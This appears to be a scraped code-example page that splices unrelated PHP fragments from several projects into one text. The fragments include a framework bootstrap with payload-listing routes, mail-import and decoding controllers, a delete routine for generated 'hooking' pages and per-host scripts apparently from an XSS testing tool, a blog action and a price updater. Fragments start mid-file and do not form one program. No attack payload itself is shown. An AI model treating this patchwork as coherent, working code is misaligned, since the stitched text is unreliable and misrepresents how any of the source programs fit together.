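if (!is_writable('framework/data/site_config.json')) {
    $writeableErr[] = sprintf('please make sure that the \'%s\' file is writable.', 'framework/data/site_config.json');
}
//handles all pagination
\Template::instance()->extend('pagebrowser', '\\Pagination::renderTag');
\Template\FooForms::init();
if (isset($writeableErr)) {
    // was 'text;', which is not a valid media type; text/plain makes browsers
    // render the bare message predictably. The message names local paths.
    header('Content-Type: text/plain');
    die(implode("\n", $writeableErr));
}
//Initialize some F3 Settings
$f3->set('FLASH', Flash::instance());
$web = Web::instance();
//Database Setup From our Config Class Instance
$cfg = Config::instance();
$f3->set('CONFIG', $cfg);
if ($cfg->ACTIVE_DB) {
    $f3->set('DB', DBHandler::instance()->get($cfg->ACTIVE_DB));
} else {
    // whether error() halts depends on the framework's HALT setting;
    // if it returns, routing below is registered without a DB
    $f3->error(500, 'Sorry, but there is no active DB setup.');
}
///////////////
//  frontend //
///////////////
$f3->route(array('GET /', 'GET /@page', 'GET /payloads', 'GET /page/@page'), 'Controller\\Payload->getList');
// view single
$f3->route(array('GET /payload/@id'), 'Controller\\Payload->viewSingle');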
ファイル: flash.php プロジェクト: Jtgadbois/Pedadida
 /**
  * Returns and removes variable from flash.
  *
  * The value is read before it is removed, so the caller receives whatever
  * the flash held under $name at call time.
  *
  * @param mixed $name flash variable key (assumed to be a string)
  * @return mixed the stored value, as returned by Flash::getVariable()
  */
 function flash_pop($name) {
   $value = Flash::instance()->getVariable($name);
   Flash::instance()->removeVariable($name);

   return $value;
 }
 /**
  * Conflict incoming mail
  *
  * Lets the user resolve an incoming mail that could not be imported
  * automatically: when the form is submitted the subject, body, creator and
  * target object are taken from the 'mail' request data and the import is
  * retried; otherwise (or when the import fails) the conflict form is
  * rendered.
  *
  * @param void
  * @return void
  */
 function conflict()
 {
     if ($this->active_mail->isNew()) {
         $this->httpError(HTTP_ERR_NOT_FOUND);
     }
     // if
     require_once INCOMING_MAIL_MODULE_PATH . '/models/IncomingMailImporter.class.php';
     // 'mail' is form data and therefore untrusted; when it is absent the form
     // is pre-filled from the stored mail instead
     $mail_data = $this->request->post('mail');
     if (!is_foreachable($mail_data)) {
         flash_error(incoming_mail_module_get_status_description($this->active_mail->getState()));
         $mail_data = array('subject' => $this->active_mail->getSubject(), 'body' => $this->active_mail->getBody(), 'created_by_id' => $this->active_mail->getCreatedById(), 'project_id' => $this->active_mail->getProjectId());
     }
     // if
     if ($this->request->isSubmitted()) {
         $this->active_mail->setSubject(array_var($mail_data, 'subject'));
         $this->active_mail->setBody(array_var($mail_data, 'body'));
         $creator_id = array_var($mail_data, 'created_by_id');
         // 'original_author' appears to be a sentinel that is passed on to the
         // importer (see the second importPendingEmail() argument) rather than a
         // real user id; only other non-empty values are looked up
         if ($creator_id && $creator_id != 'original_author') {
             $creator = Users::findById($creator_id);
             if (instance_of($creator, 'User')) {
                 $this->active_mail->setCreatedBy($creator);
             }
             // if
         }
         // if
         // NOTE(review): created_by_id, object_type and parent_id are copied
         // from the request with no permission check visible here; confirm the
         // importer (or an earlier filter) verifies that the logged-in user may
         // attach mail to that object on behalf of that creator.
         $this->active_mail->setCreatedById(array_var($mail_data, 'created_by_id'));
         $this->active_mail->setObjectType(array_var($mail_data, 'object_type'));
         if (array_var($mail_data, 'object_type') == 'comment') {
             $this->active_mail->setParentId(array_var($mail_data, 'parent_id'));
         }
         // if
         // import email
         if (instance_of($importing_result = IncomingMailImporter::importPendingEmail($this->active_mail, $creator_id == 'original_author'), 'ProjectObject')) {
             // we have successfully imported email
             $this->active_mail->delete();
             if ($this->request->isAsyncCall()) {
                 $this->renderText(lang('<p>Conflict Solved Successfully!</p><p>View created <a href=":url">:object</a>.</p>', array('object' => $this->active_mail->getObjectType(), 'url' => $importing_result->getViewUrl())));
             } else {
                 flash_success('Conflict Solved Successfully!');
                 $this->redirectTo('incoming_mail');
             }
             // if
         } else {
             // on failure $importing_result is presumably an error object with
             // getMessage() -- the non-async branch relies on that
             if ($this->request->isAsyncCall()) {
                 $this->httpError(HTTP_ERR_INVALID_PROPERTIES, null, false, 2);
             } else {
                 flash_error($importing_result->getMessage());
             }
             // if
         }
         // if
     }
     // if
     // fall through to rendering the form (not submitted, or import failed)
     $user = $this->active_mail->getCreatedBy();
     if (instance_of($user, 'User')) {
         $this->smarty->assign('object_user', $user);
     } else {
         $this->smarty->assign('object_user', $this->logged_user);
     }
     // if
     $this->smarty->assign(array('async' => $this->request->isAsyncCall(), 'form_url' => $this->active_mail->getImportUrl() . ($this->request->isAsyncCall() ? '?skip_layout=1&async=1' : ''), 'status_message' => incoming_mail_module_get_status_description($this->active_mail->getState()), 'mail_data' => $mail_data, 'project' => $this->active_mail->getProject()));
     // reference-assigning a call result raises "Only variables should be
     // assigned by reference" unless instance() returns by reference; a plain
     // '=' would do the same job
     $flash =& Flash::instance();
     $flash->init();
     js_assign('additional_fields_url', assemble_url('incoming_mail_additional_form_fields'));
 }
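 /**
  * Handles Decoding Functions
  *
  * On a POST request the submitted text (POST.encoded) is decoded according
  * to POST.encodedFormat and the resulting bytes are stored in
  * $this->response->data['content']; every problem is reported as a Flash
  * warning instead. A non-POST request only selects the sub-template.
  *
  * @param \Base $f3
  */
 public function decoder_multi(\Base $f3)
 {
     $this->response->data['SUBPART'] = 'dencoder_decoder_multi.html';
     if ($f3->get('VERB') !== 'POST') {
         return;
     }
     $flash = \Flash::instance();
     if ($f3->devoid('POST.encoded')) {
         $flash->addMessage('Please enter Some text to decode e.g. 0xaaaa ', 'warning');
         return;
     }
     $encoded_text_string = $f3->get('POST.encoded');
     $encodedFormat = $f3->get('POST.encodedFormat');
     // NOTE(review): the decoded bytes are handed to the template unmodified;
     // the template is responsible for escaping them for the HTML context --
     // confirm it does so.
     switch ($encodedFormat) {
         case "base64":
             $decoded = trim($encoded_text_string);
             // strict decode plus round-trip keeps the original acceptance rule:
             // only canonical (correctly padded, no stray characters) input passes
             $binary = base64_decode($decoded, true);
             if ($binary !== false && base64_encode($binary) === $decoded) {
                 $this->response->data['content'] = $binary;
             } else {
                 $flash->addMessage('Please enter a valid base 64 string e.g. dGVzdG1l ', 'warning');
             }
             break;
         case "hex":
             $this->decodeHexDigits($flash, trim($encoded_text_string));
             break;
         case "hex_0x":
             $this->decodeHexDigits($flash, trim(str_replace("0x", "", $encoded_text_string)));
             break;
         case "hex_slash_x":
             $this->decodeHexDigits($flash, trim(str_replace("\\x", "", $encoded_text_string)));
             break;
         case "rot13":
             $this->response->data['content'] = str_rot13(trim($encoded_text_string));
             break;
         default:
             $flash->addMessage('Seems You have Broken something or text is invalid \\n I can\'t process', 'warning');
     }
 }

 /**
  * Shared tail of the three hexadecimal formats: validates the digit string
  * and stores its binary form in the response, or reports why it could not.
  *
  * The previous check, is_numeric('0x' . $hex), has rejected every input
  * since PHP 7 (hexadecimal strings are no longer numeric), so no hex format
  * could ever decode. ctype_xdigit() plus an even-length check is exactly
  * what hex2bin() requires.
  *
  * @param \Flash $flash message sink for validation problems
  * @param string $hex hexadecimal digits only, prefix already stripped
  */
 private function decodeHexDigits($flash, $hex)
 {
     if ($hex === '' || !ctype_xdigit($hex) || strlen($hex) % 2 !== 0) {
         $flash->addMessage('Invalid Hexadecimal String detected, check for trailing spaces or invalid characters then try again.', 'warning');
         return;
     }
     if (!function_exists('hex2bin')) {
         $flash->addMessage('Seems you are missing the hex2bin function , this is common with PHP 5.3 and below \\n Sorry I can\'t work this . ', 'warning');
         return;
     }
     $this->response->data['content'] = hex2bin($hex);
 }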
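 /**
  * Delete Cookies & Files with content from hooking page
  *
  * Removes the generated vulnerable page, indirect target page and script
  * that belong to the resource, then lets the parent delete the record
  * itself. The file paths are rebuilt from URLs stored on the resource, so
  * every unlink is confined to the application root ($f3->ROOT): a stored
  * URL whose path escapes that directory (via '..' or a symlink) is skipped.
  * Each file is handled on its own; the old code unlinked all three as soon
  * as any one of them existed and warned on the missing ones.
  *
  * @param \Base $f3
  * @param array $params route tokens; only 'id' is used
  */
 public function delete(\Base $f3, $params)
 {
     $this->resource->reset();
     \Flash::instance();
     if (isset($params['id'])) {
         $this->resource->load(array('_id = ?', $params['id']));
         $root = (string) $f3->ROOT;
         $candidates = array(
             $root . parse_url($this->resource->vulnerablePageContent, PHP_URL_PATH),
             $root . parse_url($this->resource->indirect_target_page, PHP_URL_PATH),
         );
         // the script is named after the host of vulnerableUrl; without a host
         // there is no file to look for
         $host = parse_url($this->resource->vulnerableUrl, PHP_URL_HOST);
         if (is_string($host) && $host !== '') {
             $candidates[] = $root . $f3->BASE . '/scripts/' . $host . '.js';
         }
         foreach ($candidates as $candidate) {
             $this->unlinkInsideRoot($root, $candidate);
         }
         parent::delete($f3, $params);
     }
     // NOTE(review): LastPageURL comes from the session; confirm it is only
     // ever set from this application's own URLs before rerouting to it.
     $f3->reroute($f3->get('SESSION.LastPageURL'));
 }

 /**
  * Remove $path if it is an existing regular file located under $root.
  *
  * Both sides are resolved with realpath() so '..' segments or symlinks in a
  * stored URL cannot point the unlink outside the application directory.
  *
  * @param string $root application directory
  * @param string $path candidate file path
  * @return bool true when a file was actually unlinked
  */
 private function unlinkInsideRoot($root, $path)
 {
     $realRoot = realpath($root);
     $realPath = realpath($path);
     if ($realRoot === false || $realPath === false || !is_file($realPath)) {
         return false;
     }
     $prefix = rtrim($realRoot, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
     if (strncmp($realPath, $prefix, strlen($prefix)) !== 0) {
         return false;
     }
     return unlink($realPath);
 }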
ファイル: post.php プロジェクト: xfra35/fabulog
 /**
  * Unpublish the post selected by the route and return to the admin list.
  *
  * NOTE(review): this is a state-changing action; confirm the admin routes
  * carry CSRF protection, none is visible here.
  *
  * @param \Base $f3
  * @param array $params route tokens; 'id' selects the post
  */
 public function hide($f3, $params)
 {
     $filter = array('_id = ?', $params['id']);
     $hidden = $this->resource->updateProperty($filter, 'published', false);
     \Flash::instance()->addMessage(
         $hidden ? 'Your post is now hidden.' : 'This Post ID was not found',
         $hidden ? 'success' : 'danger'
     );
     $f3->reroute('/admin/post');
 }
 /**
  * Apply the price uplift selected on the current page and report the
  * outcome as JSON.
  *
  * For every selected product line the current price row is closed off
  * (end_date set), a new row with the new price and start date is created,
  * and the session progress counters are advanced. The response is
  * {updated_count, warnings, errors} and the request ends with exit.
  *
  * Reads (assumed to be prepared by an earlier step of the uplift wizard --
  * TODO confirm): $_SESSION['price_uplift_params'] and
  * $_SESSION['price_uplift'][page]; $this->_data['page'] selects the page.
  */
 public function update_prices()
 {
     $flash = Flash::instance();
     $errors = array();
     $warnings = array();
     $db = DB::Instance();
     $start_date = $_SESSION['price_uplift_params']['price_uplift_start_date'];
     $end_date = $_SESSION['price_uplift_params']['price_uplift_end_date'];
     $selected = empty($_SESSION['price_uplift'][$this->_data['page']]) ? array() : $_SESSION['price_uplift'][$this->_data['page']];
     $count = 0;
     foreach ($selected as $id => $detail) {
         // a transaction is opened for every entry, selected or not; it is
         // always closed by CompleteTrans() below
         $db->StartTrans();
         if ($detail['select'] == 'true') {
             $productline = DataObjectFactory::Factory('SOProductLine');
             $productline->load($id);
             if (!$productline->isLoaded()) {
                 $errors[$id] = 'Failed to find product details ' . $id;
             } elseif ($productline->price == $detail['new_price']) {
                 // loose comparison on purpose: new_price arrives as a string
                 $warnings[$id] = 'Entry not updated because price has not changed ref:' . $id;
             } else {
                 // step 1: close off the existing price row
                 $productline->end_date = $end_date;
                 if (!$productline->save()) {
                     $errors[$id] = 'Failed to close off old price ref:' . $id . ' - ' . $db->ErrorMsg();
                 } else {
                     // step 2: reuse the loaded object as the new row; autoHandle()
                     // presumably allocates a fresh identifier -- false means it could not
                     $test = $productline->autoHandle($productline->idField);
                     if ($test !== false) {
                         $productline->id = $test;
                         $productline->price = $detail['new_price'];
                         $productline->start_date = $start_date;
                         $productline->end_date = null;
                         $productline->created = fix_date(date(DATE_FORMAT));
                         $productline->createdby = EGS_USERNAME;
                         if (!$productline->save()) {
                             $errors[$id] = 'Failed to save new price ref:' . $id . ' - ' . $db->ErrorMsg();
                         } else {
                             $count++;
                         }
                     } else {
                         // unkeyed on purpose? every other error is keyed by $id
                         $errors[] = 'Error getting identifier for new price';
                     }
                 }
             }
             unset($productline);
         }
         // NOTE(review): CompleteTrans() is called even when an error was
         // recorded; whether the DB layer rolls back on failure is not visible here
         $db->CompleteTrans();
         // assumes the counter was initialised by the wizard; otherwise this is an
         // undefined-index notice
         $_SESSION['price_uplift_params']['price_uplift_progress_count']++;
     }
     if (count($errors) > 0) {
         $flash->addErrors($errors);
     }
     if (count($warnings) > 0) {
         $flash->addWarnings($warnings);
     }
     $flash->save();
     $_SESSION['price_uplift_params']['price_uplift_updated_count'] += $count;
     // AJAX response; no Content-Type header is set here, so it is either set
     // elsewhere or the caller does not depend on it
     echo json_encode(array('updated_count' => $count, 'warnings' => $warnings, 'errors' => $errors));
     exit;
 }